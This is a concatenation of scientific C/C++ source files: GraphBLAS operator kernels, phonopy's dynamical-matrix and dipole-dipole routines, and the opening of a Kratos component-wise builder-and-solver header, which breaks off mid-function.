// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
int8_t *Cx = (int8_t *) Cx_output ;
int8_t *Ax = (int8_t *) Ax_input ;
int8_t y = (*((int8_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
; ;
Cx [p] = y ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
int8_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t x = (*((const int8_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = y ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t y = (*((const int8_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
dynmat.c | /* Copyright (C) 2015 Atsushi Togo */
/* All rights reserved. */
/* This file is part of phonopy. */
/* Redistribution and use in source and binary forms, with or without */
/* modification, are permitted provided that the following conditions */
/* are met: */
/* * Redistributions of source code must retain the above copyright */
/* notice, this list of conditions and the following disclaimer. */
/* * Redistributions in binary form must reproduce the above copyright */
/* notice, this list of conditions and the following disclaimer in */
/* the documentation and/or other materials provided with the */
/* distribution. */
/* * Neither the name of the phonopy project nor the names of its */
/* contributors may be used to endorse or promote products derived */
/* from this software without specific prior written permission. */
/* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS */
/* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT */
/* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS */
/* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE */
/* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, */
/* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; */
/* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER */
/* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT */
/* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN */
/* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
#include <math.h>
#include <stdlib.h>
#include "dynmat.h"
#define PI 3.14159265358979323846
static void get_dynmat_ij(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j);
static void get_dm(double dm_real[3][3],
double dm_imag[3][3],
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j,
const int k);
static double get_dielectric_part(const double q_cart[3],
PHPYCONST double dielectric[3][3]);
static void get_KK(double *dd_part, /* [natom, 3, natom, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart,
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance);
static void make_Hermitian(double *mat, const int num_band);
static void multiply_borns(double *dd,
const double *dd_in,
const int num_patom,
PHPYCONST double (*born)[3][3]);
int dym_get_dynamical_matrix_at_q(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int with_openmp)
{
int i, j, ij;
if (with_openmp) {
#pragma omp parallel for
for (ij = 0; ij < num_patom * num_patom ; ij++) {
get_dynmat_ij(dynamical_matrix,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
mass,
s2p_map,
p2s_map,
charge_sum,
ij / num_patom, /* i */
ij % num_patom); /* j */
}
} else {
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
get_dynmat_ij(dynamical_matrix,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
mass,
s2p_map,
p2s_map,
charge_sum,
i,
j);
}
}
}
make_Hermitian(dynamical_matrix, num_patom * 3);
return 0;
}
void dym_get_recip_dipole_dipole(double *dd, /* [natom, 3, natom, 3, (real,imag)] */
const double *dd_q0, /* [natom, 3, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart, /* must be pointer */
PHPYCONST double (*born)[3][3],
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double factor, /* 4pi/V*unit-conv */
const double lambda,
const double tolerance)
{
int i, k, l, adrs, adrs_sum;
double *dd_tmp;
dd_tmp = NULL;
dd_tmp = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd[i] = 0;
dd_tmp[i] = 0;
}
get_KK(dd_tmp,
G_list,
num_G,
num_patom,
q_cart,
q_direction_cart,
dielectric,
pos,
lambda,
tolerance);
multiply_borns(dd, dd_tmp, num_patom, born);
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * num_patom * 9 + k * num_patom * 3 + i * 3 + l;
adrs_sum = i * 9 + k * 3 + l;
dd[adrs * 2] -= dd_q0[adrs_sum * 2];
dd[adrs * 2 + 1] -= dd_q0[adrs_sum * 2 + 1];
}
}
}
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd[i] *= factor;
}
/* This may not be necessary. */
/* make_Hermitian(dd, num_patom * 3); */
free(dd_tmp);
dd_tmp = NULL;
}
void dym_get_recip_dipole_dipole_q0(double *dd_q0, /* [natom, 3, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
PHPYCONST double (*born)[3][3],
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance)
{
int i, j, k, l, adrs_tmp, adrs, adrsT;
double zero_vec[3];
double *dd_tmp1, *dd_tmp2;
dd_tmp1 = NULL;
dd_tmp1 = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
dd_tmp2 = NULL;
dd_tmp2 = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd_tmp1[i] = 0;
dd_tmp2[i] = 0;
}
zero_vec[0] = 0;
zero_vec[1] = 0;
zero_vec[2] = 0;
get_KK(dd_tmp1,
G_list,
num_G,
num_patom,
zero_vec,
NULL,
dielectric,
pos,
lambda,
tolerance);
multiply_borns(dd_tmp2, dd_tmp1, num_patom, born);
for (i = 0; i < num_patom * 18; i++) {
dd_q0[i] = 0;
}
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * 9 + k * 3 + l;
for (j = 0; j < num_patom; j++) {
adrs_tmp = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l ;
dd_q0[adrs * 2] += dd_tmp2[adrs_tmp * 2];
dd_q0[adrs * 2 + 1] += dd_tmp2[adrs_tmp * 2 + 1];
}
}
}
}
/* Summation over another atomic index */
/* for (j = 0; j < num_patom; j++) { */
/* for (k = 0; k < 3; k++) { /\* alpha *\/ */
/* for (l = 0; l < 3; l++) { /\* beta *\/ */
/* adrs = j * 9 + k * 3 + l; */
/* for (i = 0; i < num_patom; i++) { */
/* adrs_tmp = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l ; */
/* dd_q0[adrs * 2] += dd_tmp2[adrs_tmp * 2]; */
/* dd_q0[adrs * 2 + 1] += dd_tmp2[adrs_tmp * 2 + 1]; */
/* } */
/* } */
/* } */
/* } */
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * 9 + k * 3 + l;
adrsT = i * 9 + l * 3 + k;
dd_q0[adrs * 2] += dd_q0[adrsT * 2];
dd_q0[adrs * 2] /= 2;
dd_q0[adrsT * 2] = dd_q0[adrs * 2];
dd_q0[adrs * 2 + 1] -= dd_q0[adrsT * 2 + 1];
dd_q0[adrs * 2 + 1] /= 2;
dd_q0[adrsT * 2 + 1] = -dd_q0[adrs * 2 + 1];
}
}
}
free(dd_tmp1);
dd_tmp1 = NULL;
free(dd_tmp2);
dd_tmp2 = NULL;
}
void dym_get_charge_sum(double (*charge_sum)[3][3],
const int num_patom,
const double factor, /* 4pi/V*unit-conv and denominator */
const double q_cart[3],
PHPYCONST double (*born)[3][3])
{
int i, j, k, a, b;
double (*q_born)[3];
q_born = (double (*)[3]) malloc(sizeof(double[3]) * num_patom);
for (i = 0; i < num_patom; i++) {
for (j = 0; j < 3; j++) {
q_born[i][j] = 0;
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < 3; j++) {
for (k = 0; k < 3; k++) {
q_born[i][j] += q_cart[k] * born[i][k][j];
}
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
for (a = 0; a < 3; a++) {
for (b = 0; b < 3; b++) {
charge_sum[i * num_patom + j][a][b] =
q_born[i][a] * q_born[j][b] * factor;
}
}
}
}
free(q_born);
q_born = NULL;
}
/* fc[num_patom, num_satom, 3, 3] */
/* dm[num_comm_points, num_patom * 3, num_patom *3] */
/* comm_points[num_satom, num_patom, 27, 3] */
/* shortest_vectors[num_satom, num_patom, 27, 3] */
/* multiplicities[num_satom, num_patom] */
void dym_transform_dynmat_to_fc(double *fc,
const double *dm,
PHPYCONST double (*comm_points)[3],
PHPYCONST double (*shortest_vectors)[27][3],
const int *multiplicities,
const double *masses,
const int *s2pp_map,
const int *fc_index_map,
const int num_patom,
const int num_satom)
{
int i, j, k, l, m, N, adrs, multi;
double coef, phase, cos_phase, sin_phase;
N = num_satom / num_patom;
for (i = 0; i < num_patom * num_satom * 9; i++) {
fc[i] = 0;
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_satom; j++) {
coef = sqrt(masses[i] * masses[s2pp_map[j]]) / N;
for (k = 0; k < N; k++) {
cos_phase = 0;
sin_phase = 0;
multi = multiplicities[j * num_patom + i];
for (l = 0; l < multi; l++) {
phase = 0;
for (m = 0; m < 3; m++) {
phase -= comm_points[k][m] *
shortest_vectors[j * num_patom + i][l][m];
}
cos_phase += cos(phase * 2 * PI);
sin_phase += sin(phase * 2 * PI);
}
cos_phase /= multi;
sin_phase /= multi;
for (l = 0; l < 3; l++) {
for (m = 0; m < 3; m++) {
adrs = k * num_patom * num_patom * 18 + i * num_patom * 18 +
l * num_patom * 6 + s2pp_map[j] * 6 + m * 2;
fc[fc_index_map[i] * num_satom * 9 + j * 9 + l * 3 + m] +=
(dm[adrs] * cos_phase - dm[adrs + 1] * sin_phase) * coef;
}
}
}
}
}
}
static void get_dynmat_ij(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j)
{
int k, l, adrs;
double mass_sqrt;
double dm_real[3][3], dm_imag[3][3];
mass_sqrt = sqrt(mass[i] * mass[j]);
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
dm_real[k][l] = 0;
dm_imag[k][l] = 0;
}
}
for (k = 0; k < num_satom; k++) { /* Lattice points of right index of fc */
if (s2p_map[k] != p2s_map[j]) {
continue;
}
get_dm(dm_real,
dm_imag,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
p2s_map,
charge_sum,
i,
j,
k);
}
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
adrs = (i * 3 + k) * num_patom * 3 + j * 3 + l;
dynamical_matrix[adrs * 2] = dm_real[k][l] / mass_sqrt;
dynamical_matrix[adrs * 2 + 1] = dm_imag[k][l] / mass_sqrt;
}
}
}
static void get_dm(double dm_real[3][3],
double dm_imag[3][3],
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j,
const int k)
{
int l, m;
double phase, cos_phase, sin_phase, fc_elem;
cos_phase = 0;
sin_phase = 0;
for (l = 0; l < multi[k * num_patom + i]; l++) {
phase = 0;
for (m = 0; m < 3; m++) {
phase += q[m] * svecs[k * num_patom + i][l][m];
}
cos_phase += cos(phase * 2 * PI) / multi[k * num_patom + i];
sin_phase += sin(phase * 2 * PI) / multi[k * num_patom + i];
}
for (l = 0; l < 3; l++) {
for (m = 0; m < 3; m++) {
if (charge_sum) {
fc_elem = (fc[p2s_map[i] * num_satom * 9 + k * 9 + l * 3 + m] +
charge_sum[i * num_patom + j][l][m]);
} else {
fc_elem = fc[p2s_map[i] * num_satom * 9 + k * 9 + l * 3 + m];
}
dm_real[l][m] += fc_elem * cos_phase;
dm_imag[l][m] += fc_elem * sin_phase;
}
}
}
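/* Together, get_dynmat_ij() and get_dm() above accumulate, for primitive
   atoms (i, j) and Cartesian components (a, b),
   D_ij^ab(q) = (1/sqrt(m_i m_j)) * sum_k Phi_ik^ab * <exp(2*pi*i q.r)>,
   where k runs over supercell atoms mapping to primitive atom j and the
   phase factor is averaged over the multiplicity of shortest vectors. */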
static double get_dielectric_part(const double q_cart[3],
PHPYCONST double dielectric[3][3])
{
int i, j;
double x[3];
double sum;
for (i = 0; i < 3; i++) {
x[i] = 0;
for (j = 0; j < 3; j++) {
x[i] += dielectric[i][j] * q_cart[j];
}
}
sum = 0;
for (i = 0; i < 3; i++) {
sum += q_cart[i] * x[i];
}
return sum;
}
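/* get_dielectric_part() returns the scalar q . epsilon . q; for an
   isotropic dielectric epsilon = I it reduces to |q|^2. It is the
   denominator of the dipole-dipole kernel assembled in get_KK(). */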
static void get_KK(double *dd_part, /* [natom, 3, natom, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart,
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance)
{
int i, j, k, l, g, adrs;
double q_K[3];
double norm, cos_phase, sin_phase, phase, dielectric_part, exp_damp, L2;
double KK[3][3];
L2 = 4 * lambda * lambda;
/* sum over K = G + q and over G (i.e. q=0) */
/* q_direction has values for summation over K at Gamma point. */
/* q_direction is NULL for summation over G */
for (g = 0; g < num_G; g++) {
norm = 0;
for (i = 0; i < 3; i++) {
q_K[i] = G_list[g][i] + q_cart[i];
norm += q_K[i] * q_K[i];
}
if (sqrt(norm) < tolerance) {
if (!q_direction_cart) {
continue;
} else {
dielectric_part = get_dielectric_part(q_direction_cart, dielectric);
for (i = 0; i < 3; i++) {
for (j = 0; j < 3; j++) {
KK[i][j] =
q_direction_cart[i] * q_direction_cart[j] / dielectric_part;
}
}
}
} else {
dielectric_part = get_dielectric_part(q_K, dielectric);
exp_damp = exp(-dielectric_part / L2);
for (i = 0; i < 3; i++) {
for (j = 0; j < 3; j++) {
KK[i][j] = q_K[i] * q_K[j] / dielectric_part * exp_damp;
}
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
phase = 0;
for (k = 0; k < 3; k++) {
/* For D-type dynamical matrix */
/* phase += (pos[i][k] - pos[j][k]) * q_K[k]; */
/* For C-type dynamical matrix */
phase += (pos[i][k] - pos[j][k]) * G_list[g][k];
}
phase *= 2 * PI;
cos_phase = cos(phase);
sin_phase = sin(phase);
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
adrs = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l;
dd_part[adrs * 2] += KK[k][l] * cos_phase;
dd_part[adrs * 2 + 1] += KK[k][l] * sin_phase;
}
}
}
}
}
}
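/* Note (added for clarity): make_Hermitian below overwrites mat, stored as an
 * interleaved (real, imag) num_band x num_band array, with (mat + mat^H) / 2,
 * i.e. it averages each element with the conjugate of its transposed partner. */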
static void make_Hermitian(double *mat, const int num_band)
{
int i, j, adrs, adrsT;
for (i = 0; i < num_band; i++) {
for (j = i; j < num_band; j++) {
adrs = i * num_band + j * 1;
adrs *= 2;
adrsT = j * num_band + i * 1;
adrsT *= 2;
/* real part */
mat[adrs] += mat[adrsT];
mat[adrs] /= 2;
/* imaginary part */
mat[adrs + 1] -= mat[adrsT+ 1];
mat[adrs + 1] /= 2;
/* store */
mat[adrsT] = mat[adrs];
mat[adrsT + 1] = -mat[adrs + 1];
}
}
}
static void multiply_borns(double *dd,
const double *dd_in,
const int num_patom,
PHPYCONST double (*born)[3][3])
{
int i, j, k, l, m, n, adrs, adrs_in;
double zz;
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l;
for (m = 0; m < 3; m++) { /* alpha' */
for (n = 0; n < 3; n++) { /* beta' */
adrs_in = i * num_patom * 9 + m * num_patom * 3 + j * 3 + n ;
zz = born[i][m][k] * born[j][n][l];
dd[adrs * 2] += dd_in[adrs_in * 2] * zz;
dd[adrs * 2 + 1] += dd_in[adrs_in * 2 + 1] * zz;
}
}
}
}
}
}
}
|
GB_unaryop__identity_fp32_int64.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__identity_fp32_int64
// op(A') function: GB_tran__identity_fp32_int64
// C type: float
// A type: int64_t
// cast: float cij = (float) aij
// unaryop: cij = aij
#define GB_ATYPE \
int64_t
#define GB_CTYPE \
float
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int64_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CASTING(z, x) \
float z = (float) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
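// For reference, GB_CAST_OP (pC, pA) expands (after macro substitution) to
// roughly the following; written out here only to show how the pieces compose:
//
//      int64_t aij = Ax [pA] ;             /* GB_GETA              */
//      float x = (float) aij ;             /* GB_CASTING           */
//      Cx [pC] = x ;                       /* GB_OP on GB_CX (pC)  */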
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_IDENTITY || GxB_NO_FP32 || GxB_NO_INT64)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__identity_fp32_int64
(
float *restrict Cx,
const int64_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__identity_fp32_int64
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
residualbased_elimination_builder_and_solver_componentwise.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
//
#if !defined(KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE )
#define KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE
/* System includes */
#include <set>
/* External includes */
#ifdef KRATOS_SMP_OPENMP
#include <omp.h>
#endif
/* Project includes */
#include "includes/define.h"
#include "solving_strategies/builder_and_solvers/residualbased_elimination_builder_and_solver.h"
#include "includes/global_pointer_variables.h"
#include "utilities/builtin_timer.h"
namespace Kratos
{
/**@name Kratos Globals */
/*@{ */
/*@} */
/**@name Type Definitions */
/*@{ */
/*@} */
/**@name Enum's */
/*@{ */
/*@} */
/**@name Functions */
/*@{ */
/*@} */
/**@name Kratos Classes */
/*@{ */
/** Short class definition.
Detail class definition.
This is a specialization of the standard building strategy to the case in which a single variable is to be used in the
building.
The creation of the DofList and the construction of the system matrix are in this case much faster,
as the neighborhood relationships are assumed to be known.
\URL[Example of use html]{ extended_documentation/no_ex_of_use.html}
\URL[Example of use pdf]{ extended_documentation/no_ex_of_use.pdf}
\URL[Example of use doc]{ extended_documentation/no_ex_of_use.doc}
\URL[Example of use ps]{ extended_documentation/no_ex_of_use.ps}
\URL[Extended documentation html]{ extended_documentation/no_ext_doc.html}
\URL[Extended documentation pdf]{ extended_documentation/no_ext_doc.pdf}
\URL[Extended documentation doc]{ extended_documentation/no_ext_doc.doc}
\URL[Extended documentation ps]{ extended_documentation/no_ext_doc.ps}
*/
template<class TSparseSpace,
class TDenseSpace ,
class TLinearSolver,
class TVariableType
>
class ResidualBasedEliminationBuilderAndSolverComponentwise
: public ResidualBasedEliminationBuilderAndSolver< TSparseSpace,TDenseSpace,TLinearSolver >
{
public:
/**@name Type Definitions */
/*@{ */
KRATOS_CLASS_POINTER_DEFINITION( ResidualBasedEliminationBuilderAndSolverComponentwise );
typedef BuilderAndSolver<TSparseSpace,TDenseSpace, TLinearSolver> BaseType;
typedef ResidualBasedEliminationBuilderAndSolver<TSparseSpace,TDenseSpace, TLinearSolver> ResidualBasedEliminationBuilderAndSolverType;
typedef typename BaseType::TSchemeType TSchemeType;
typedef typename BaseType::TDataType TDataType;
typedef typename BaseType::DofsArrayType DofsArrayType;
typedef typename BaseType::TSystemMatrixType TSystemMatrixType;
typedef typename BaseType::TSystemVectorType TSystemVectorType;
typedef typename BaseType::LocalSystemVectorType LocalSystemVectorType;
typedef typename BaseType::LocalSystemMatrixType LocalSystemMatrixType;
typedef typename BaseType::TSystemMatrixPointerType TSystemMatrixPointerType;
typedef typename BaseType::TSystemVectorPointerType TSystemVectorPointerType;
typedef typename BaseType::NodesArrayType NodesArrayType;
typedef typename BaseType::ElementsArrayType ElementsArrayType;
typedef typename BaseType::ConditionsArrayType ConditionsArrayType;
typedef typename BaseType::ElementsContainerType ElementsContainerType;
///@}
///@name Life Cycle
///@{
/**
* @brief Constructor taking a Parameters object.
*/
explicit ResidualBasedEliminationBuilderAndSolverComponentwise(
typename TLinearSolver::Pointer pNewLinearSystemSolver,
Parameters ThisParameters
) : ResidualBasedEliminationBuilderAndSolverType(pNewLinearSystemSolver)
{
// Validate default parameters
Parameters default_parameters = Parameters(R"(
{
"name" : "ResidualBasedEliminationBuilderAndSolverComponentwise",
"components_wise_variable" : "SCALAR_VARIABLE_OR_COMPONENT"
})" );
ThisParameters.ValidateAndAssignDefaults(default_parameters);
rVar = KratosComponents<TVariableType>::Get(ThisParameters["components_wise_variable"].GetString());
}
/**
* @brief Constructor taking the component-wise variable directly.
*/
explicit ResidualBasedEliminationBuilderAndSolverComponentwise(
typename TLinearSolver::Pointer pNewLinearSystemSolver,TVariableType const& Var)
: ResidualBasedEliminationBuilderAndSolverType(pNewLinearSystemSolver)
, rVar(Var)
{
/* std::cout << "using the standard builder and solver " << std::endl; */
}
/** Destructor.
*/
~ResidualBasedEliminationBuilderAndSolverComponentwise() override {}
/*@} */
/**@name Operators
*/
/*@{ */
//**************************************************************************
//**************************************************************************
void Build(
typename TSchemeType::Pointer pScheme,
ModelPart& r_model_part,
TSystemMatrixType& A,
TSystemVectorType& b) override
{
KRATOS_TRY
if(!pScheme)
KRATOS_THROW_ERROR(std::runtime_error, "No scheme provided!", "");
//getting the elements from the model
ElementsArrayType& pElements = r_model_part.Elements();
//getting the array of the conditions
ConditionsArrayType& ConditionsArray = r_model_part.Conditions();
//resetting to zero the vector of reactions
TSparseSpace::SetToZero( *(BaseType::mpReactionsVector) );
//create a partition of the element array
int number_of_threads = ParallelUtilities::GetNumThreads();
#ifdef _OPENMP
int A_size = A.size1();
//creating an array of lock variables of the size of the system matrix
std::vector< omp_lock_t > lock_array(A.size1());
for(int i = 0; i<A_size; i++)
omp_init_lock(&lock_array[i]);
#endif
DenseVector<unsigned int> element_partition;
CreatePartition(number_of_threads, pElements.size(), element_partition);
if (this->GetEchoLevel()>0)
{
KRATOS_WATCH( number_of_threads );
KRATOS_WATCH( element_partition );
}
const auto timer = BuiltinTimer();
#pragma omp parallel for firstprivate(number_of_threads) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
//contributions to the system
LocalSystemMatrixType LHS_Contribution = LocalSystemMatrixType(0,0);
LocalSystemVectorType RHS_Contribution = LocalSystemVectorType(0);
//vector containing the localization in the system of the different
//terms
Element::EquationIdVectorType EquationId;
const ProcessInfo& CurrentProcessInfo = r_model_part.GetProcessInfo();
typename ElementsArrayType::ptr_iterator it_begin=pElements.ptr_begin()+element_partition[k];
typename ElementsArrayType::ptr_iterator it_end=pElements.ptr_begin()+element_partition[k+1];
unsigned int pos = (r_model_part.Nodes().begin())->GetDofPosition(rVar);
// assemble all elements
for (typename ElementsArrayType::ptr_iterator it=it_begin; it!=it_end; ++it)
{
//calculate elemental contribution
(*it)->CalculateLocalSystem(LHS_Contribution,RHS_Contribution,CurrentProcessInfo);
Geometry< Node<3> >& geom = (*it)->GetGeometry();
if(EquationId.size() != geom.size()) EquationId.resize(geom.size(),false);
for(unsigned int i=0; i<geom.size(); i++)
EquationId[i] = geom[i].GetDof(rVar,pos).EquationId();
//assemble the elemental contribution
#ifdef USE_LOCKS_IN_ASSEMBLY
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId,lock_array);
#else
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId);
#endif
}
}
DenseVector<unsigned int> condition_partition;
CreatePartition(number_of_threads, ConditionsArray.size(), condition_partition);
#pragma omp parallel for firstprivate(number_of_threads) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
//contributions to the system
LocalSystemMatrixType LHS_Contribution = LocalSystemMatrixType(0,0);
LocalSystemVectorType RHS_Contribution = LocalSystemVectorType(0);
Condition::EquationIdVectorType EquationId;
const ProcessInfo& CurrentProcessInfo = r_model_part.GetProcessInfo();
typename ConditionsArrayType::ptr_iterator it_begin=ConditionsArray.ptr_begin()+condition_partition[k];
typename ConditionsArrayType::ptr_iterator it_end=ConditionsArray.ptr_begin()+condition_partition[k+1];
unsigned int pos = (r_model_part.Nodes().begin())->GetDofPosition(rVar);
// assemble all conditions
for (typename ConditionsArrayType::ptr_iterator it=it_begin; it!=it_end; ++it)
{
//calculate elemental contribution
(*it)->CalculateLocalSystem(LHS_Contribution,RHS_Contribution,CurrentProcessInfo);
Geometry< Node<3> >& geom = (*it)->GetGeometry();
